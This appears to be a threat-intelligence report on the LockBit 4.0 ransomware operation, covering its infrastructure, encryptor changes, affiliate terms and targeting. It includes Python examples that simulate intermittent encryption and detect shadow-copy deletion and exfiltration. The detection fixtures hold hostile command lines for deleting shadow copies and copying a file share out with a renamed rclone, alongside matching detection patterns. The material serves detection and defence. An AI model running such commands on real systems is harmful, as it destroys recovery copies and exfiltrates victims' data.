LockBit 4.0: Resurgence After Operation Cronos
Following the February 2024 law enforcement takedown, LockBit has re-emerged as LockBit 4.0 with hardened infrastructure, a new encryptor, and a reformed affiliate program targeting mid-market enterprises.
Overview
LockBit’s trajectory since Operation Cronos — the February 2024 coordinated takedown by Europol, the FBI, NCA, and a dozen allied agencies — has been one of the most closely watched stories in ransomware intelligence. Dmitry Khoroshev, unmasked as the alleged LockBit administrator “LockBitSupp,” attempted to maintain operations throughout 2024, but infrastructure seizures, affiliate defections, and public exposure of the backend panel crippled the group’s capability for most of that year.
By mid-2025, however, signals of reconstitution began appearing. Threat intelligence teams at multiple vendors observed new dark-web postings, fresh recruitment threads on underground forums, and encryptor samples with architectural differences from LockBit 3.0 (also called LockBit Black). By late 2025 the rebuilt operation was being tracked as LockBit 4.0.
New Infrastructure Architecture
Operation Cronos succeeded in part because LockBit had centralized too much. The takedown team gained access to administrative panels, affiliate credential stores, and decryption keys. LockBit 4.0 has shifted toward a federated model with significant operational security improvements:
Bulletproof hosting rotation. The new infrastructure cycles through a larger pool of hosting providers, primarily in jurisdictions with poor extradition cooperation. RDP and VNC management channels are now proxied through at least two intermediary nodes before reaching operational infrastructure.
Affiliate isolation. Affiliates in the 4.0 program operate in a more compartmentalized fashion. The central group provides the encryptor and negotiation portal, but affiliates maintain independent victim communication channels for initial contact. This limits what law enforcement can reconstruct from any single affiliate compromise.
Tor v3 hidden services. The leak site and affiliate portal run on v3 onion addresses. This is a baseline rather than a 4.0 hardening step: the Tor network dropped support for v2 onion services in late 2021, so any onion service reachable since then, including the group's earlier sites, has necessarily been v3. The v3 design is cryptographically stronger (Ed25519 identity keys, unenumerable descriptors) than v2, but it does not by itself make the operators harder to identify; the infrastructure changes above are what matter operationally.
Updated Encryptor: Technical Changes
The LockBit 4.0 encryptor shows meaningful departures from the LockBit 3.0 codebase, whose builder leaked in September 2022:
- Encryption scheme: Shifted from an AES-256 + RSA-2048 hybrid to ChaCha20-Poly1305 for file content, with RSA-4096 wrapping the per-file keys. ChaCha20 is considerably faster than AES in software on CPUs without AES-NI, which matters on the older industrial and healthcare hardware the group targets. The change has no bearing on recoverability: without the operators' RSA private key, files encrypted by either scheme are unrecoverable.
- ESXi targeting: The Linux/ESXi variant enumerates and terminates running virtual machines before encryption. A powered-on VM holds locks on its disk files, so variants that skipped locked files left those disks and their snapshots intact and recoverable; killing the VMs first closes that gap.
- Shadow copy deletion: Removes volume shadow copies through WMI (Win32_ShadowCopy) and direct VSS COM calls rather than by spawning vssadmin.exe. Detection rules that key only on vssadmin command lines miss both paths. The WMI path still surfaces as a wmic.exe or PowerShell command line; the COM path leaves no command line at all and is visible mainly as an unexpected process loading vssapi.dll.
- Defense evasion: Injects into svchost.exe before encryption begins, so that the file I/O and shadow-copy activity are attributed to a trusted system process name rather than to the dropped binary. This is masquerading rather than persistence; the benefit is delaying the point at which behavioral rules attribute the encryption to a malicious process.
- Intermittent encryption: Files above 4 GB are encrypted one 1 MB block in every two rather than in full, substantially increasing throughput on file servers holding large media or database files. The skipped half is genuine plaintext, which is rarely enough to rebuild a file but is enough to make whole-file entropy heuristics unreliable, since each large file is only half ciphertext.
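The intermittent scheme described in the last bullet, as an added example that is not from the page or from any LockBit sample: the ranges the encryptor would touch for a given file size, the resulting ciphertext fraction, and why a whole-file entropy threshold misses such a file while a block-wise check does not. The 4 GB limit and 1 MB block are the article's figures (interpreted here as 4 GiB and 1 MiB); the 512 KiB test buffer, the scaled-down limits used in `demo()`, and the use of random bytes as a stand-in for ciphertext are this example's own assumptions.

```python
import math
import os
from collections import Counter

# Scheme as the article describes it: files larger than 4 GiB are processed in
# 1 MiB blocks and only every other block is encrypted; smaller files are
# encrypted in full. Both values are parameters so the demo can run on a small buffer.
FULL_ENCRYPT_LIMIT = 4 * 2**30
BLOCK = 2**20


def encrypted_ranges(size, limit=FULL_ENCRYPT_LIMIT, block=BLOCK):
    """Byte ranges [start, end) the encryptor overwrites for a file of `size` bytes."""
    if size <= limit:
        return [(0, size)]
    # Encrypt the block at offset 0, skip one block, encrypt the next, and so on.
    return [(s, min(s + block, size)) for s in range(0, size, 2 * block)]


def encrypted_fraction(size, limit=FULL_ENCRYPT_LIMIT, block=BLOCK):
    """Share of the file that is actually ciphertext after the run."""
    touched = sum(e - s for s, e in encrypted_ranges(size, limit, block))
    return touched / size


def shannon_entropy(data):
    """Bits per byte: close to 8.0 for ciphertext, well below that for most plaintext."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def simulate_encrypt(data, limit, block):
    """Stand-in for the encryptor: overwrite each chosen range with random bytes."""
    out = bytearray(data)
    for s, e in encrypted_ranges(len(data), limit, block):
        out[s:e] = os.urandom(e - s)
    return bytes(out)


def blockwise_entropy(data, block):
    return [shannon_entropy(data[i:i + block]) for i in range(0, len(data), block)]


def looks_intermittently_encrypted(data, block, high=7.5, low=6.0):
    """Flag a file whose blocks alternate between ciphertext-like and plaintext-like entropy."""
    ents = blockwise_entropy(data, block)
    if len(ents) < 4:
        return False
    hi = [h >= high for h in ents]
    lo = [h <= low for h in ents]
    return (all(hi[0::2]) and all(lo[1::2])) or (all(hi[1::2]) and all(lo[0::2]))


def demo():
    """Run the scheme over a constructed 512 KiB 'file' with scaled-down parameters."""
    block, limit = 64 * 1024, 256 * 1024  # stand-ins for 1 MiB / 4 GiB (assumed for the demo)
    # Constructed low-entropy content: 14 distinct byte values, so its entropy is under 3.9 bits.
    plaintext = (b"INVOICE 2026-01 ACME " * 30_000)[: 8 * block]
    ciphertext = simulate_encrypt(plaintext, limit, block)
    return {
        "fraction_encrypted": encrypted_fraction(len(plaintext), limit, block),
        "whole_file_entropy": shannon_entropy(ciphertext),
        "block_entropies": [round(h, 2) for h in blockwise_entropy(ciphertext, block)],
        "whole_file_flagged": shannon_entropy(ciphertext) >= 7.5,
        "blockwise_flagged": looks_intermittently_encrypted(ciphertext, block),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the article's real parameters a 5 GiB file comes out exactly half ciphertext, and a whole-file entropy score for a half-plaintext file is bounded well below the 7.5 bits/byte that fully encrypted output reaches, which is why the block-wise alternation test is the one worth deploying on file servers.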
Affiliate Recruitment and RaaS Model
The LockBit 4.0 affiliate program has been rebuilt with stricter vetting. Underground forum recruitment threads — observed on RAMP and several Russian-language cybercrime boards — require proof of prior access broker activity or demonstrated network intrusion capability. Initial deposits in Monero (rather than Bitcoin) are required to join, making financial tracking harder.
The revenue split remains competitive at 80/20 in favor of affiliates, with a 75/25 split for affiliates generating over $5M in quarterly payments. Uniquely, LockBit 4.0 now offers a “negotiation SLA” — promising affiliates that the central team will respond to victim negotiations within four hours, a direct response to complaints that slow negotiation turnaround cost affiliates deals under the previous program.
Targeting Profile
LockBit 4.0 has largely abandoned the “big game hunting” approach that characterized some 2022–2023 operations against critical infrastructure. Law enforcement attention on high-profile victims has pushed the group toward mid-market targets: companies with $50M–$500M in annual revenue, sufficient cyber insurance, and less mature security operations.
Most targeted sectors in 2025–2026:
- Manufacturing and industrial (26% of confirmed victims)
- Legal and professional services (19%)
- Financial services, excluding tier-1 institutions (17%)
- Healthcare — specifically regional hospitals and specialty clinics (14%)
The geographic spread has also shifted. North American targets remain dominant (~52%) but EU targets have declined as LockBit attempts to reduce geopolitical heat from European law enforcement agencies that were central to Operation Cronos.
Negotiation and Payment Tactics
Initial demands in confirmed 2026 incidents range from $800K to $12M, with payments settling at 35% to 60% of the initial demand after negotiation. The group employs a tiered exfiltration threat: a 72-hour countdown before the first data publication, followed by staged releases designed to maximize pressure without exhausting all leverage before payment.
One notable change is the introduction of “data insurance” framing — LockBit 4.0 now explicitly markets the ransom payment as purchasing deletion of exfiltrated data rather than merely receiving a decryptor. While no ransomware actor’s data-deletion promises are reliably honored, this framing has proven effective in sectors where regulatory exposure from data publication is high.
Defensive Recommendations
Organizations should prioritize detection of the post-exploitation tooling LockBit affiliates consistently deploy before encryption: Cobalt Strike with malleable C2 profiles, Brute Ratel C4, and increasingly the Havoc framework. Monitoring for RClone, WinSCP, and MegaSync execution in unexpected contexts catches exfiltration before the ransomware is detonated; because affiliates routinely rename these binaries, match on the PE version-resource name (OriginalFileName in Sysmon process-creation events) rather than the on-disk filename. Shadow-copy detections should cover wmic shadowcopy delete, Win32_ShadowCopy manipulation from PowerShell, and vssapi.dll loads by processes that are not backup agents, not just vssadmin. ESXi hosts should have SSH disabled unless it is actually needed (with root login blocked where it is), lockdown mode enabled so the host is managed only through vCenter, MFA enforced on vCenter and any remaining management interface, and the management network segregated from user-reachable VLANs.
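The detection logic suggested above, and the coverage gap described under Shadow copy deletion in the encryptor section, as an added example that is not from the page or from any vendor's ruleset: a small rule set run over constructed Sysmon-shaped events (EventID 1 process creation, EventID 7 image load), comparing what a vssadmin-only rule catches against rules that also cover WMI, PowerShell, vssapi.dll loads and renamed exfiltration tools. The event contents, the backup-agent allowlist, and the treatment of explorer.exe as the only expected parent for interactive tool launches are this example's assumptions.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample telemetry in a flattened Sysmon-like shape. Field names
# follow Sysmon; the paths, command lines and parents are made up for this example.
EVENTS: List[Event] = [
    {"EventID": "1", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet",
     "ParentImage": r"C:\Users\Public\lb.exe"},
    {"EventID": "1", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic shadowcopy delete",
     "ParentImage": r"C:\Users\Public\lb.exe"},
    {"EventID": "1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -nop -c "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"',
     "ParentImage": r"C:\Users\Public\lb.exe"},
    {"EventID": "7", "Image": r"C:\Users\Public\lb.exe",
     "ImageLoaded": r"C:\Windows\System32\vssapi.dll"},
    {"EventID": "7", "Image": r"C:\Program Files\BackupVendor\agent.exe",
     "ImageLoaded": r"C:\Windows\System32\vssapi.dll"},
    {"EventID": "1", "Image": r"C:\ProgramData\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"svchost.exe copy D:\Shares\Finance remote:bk --transfers 32 --config C:\ProgramData\r.conf",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": "1", "Image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe", "OriginalFileName": "WinSCP.exe",
     "CommandLine": r'"C:\Program Files (x86)\WinSCP\WinSCP.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# The narrow rule the article says the new encryptor sidesteps.
LEGACY_VSSADMIN = re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I)

# Broader coverage: vssadmin, wmic, and Win32_ShadowCopy driven from PowerShell/WMI.
SHADOW_COPY_TAMPERING = [
    LEGACY_VSSADMIN,
    re.compile(r"\bvssadmin(\.exe)?\s+resize\s+shadowstorage", re.I),
    re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"Win32_ShadowCopy.*(\.Delete\(\)|Remove-(Wmi|Cim)Instance)", re.I | re.S),
]

# Processes expected to load vssapi.dll. An assumed allowlist; tune it to the
# backup software actually deployed in the estate.
VSSAPI_ALLOWED_IMAGES = {
    r"c:\program files\backupvendor\agent.exe",
    r"c:\windows\system32\vssvc.exe",
    r"c:\windows\system32\wbengine.exe",
}

# Exfiltration tooling, matched on the PE version-resource name Sysmon records
# as OriginalFileName so that a renamed copy is still caught.
EXFIL_TOOLS = {"rclone.exe", "winscp.exe", "megasync.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # assumption: only interactive launches are expected


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rules_for(ev: Event) -> List[str]:
    """Return the names of every rule that fires on one event."""
    fired = []
    cmd = ev.get("CommandLine", "")
    if ev["EventID"] == "1":
        if any(p.search(cmd) for p in SHADOW_COPY_TAMPERING):
            fired.append("shadow_copy_tampering")
        orig = ev.get("OriginalFileName", "").lower()
        if orig in EXFIL_TOOLS:
            renamed = basename(ev["Image"]) != orig
            scripted_parent = basename(ev.get("ParentImage", "")) not in INTERACTIVE_PARENTS
            if renamed or scripted_parent:
                fired.append("exfil_tool_unexpected_context")
    elif ev["EventID"] == "7":
        if (basename(ev.get("ImageLoaded", "")) == "vssapi.dll"
                and ev["Image"].lower() not in VSSAPI_ALLOWED_IMAGES):
            fired.append("vssapi_load_by_unexpected_process")
    return fired


def triage(events: List[Event]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every hit across the event set."""
    return [(i, r) for i, ev in enumerate(events) for r in rules_for(ev)]


def legacy_hits(events: List[Event]) -> List[int]:
    """What a vssadmin-only rule would have caught, for comparison."""
    return [i for i, ev in enumerate(events)
            if ev["EventID"] == "1" and LEGACY_VSSADMIN.search(ev.get("CommandLine", ""))]


if __name__ == "__main__":
    print("legacy vssadmin rule hits:", legacy_hits(EVENTS))
    for idx, rule in triage(EVENTS):
        print(f"event {idx}: {rule}")
```

On the sample set the legacy rule fires once, while the broader set flags all three shadow-copy deletion paths, the unknown binary loading vssapi.dll (the only trace a direct COM call leaves in this telemetry), and the renamed rclone launched from cmd.exe, and stays quiet on WinSCP started interactively from its install directory.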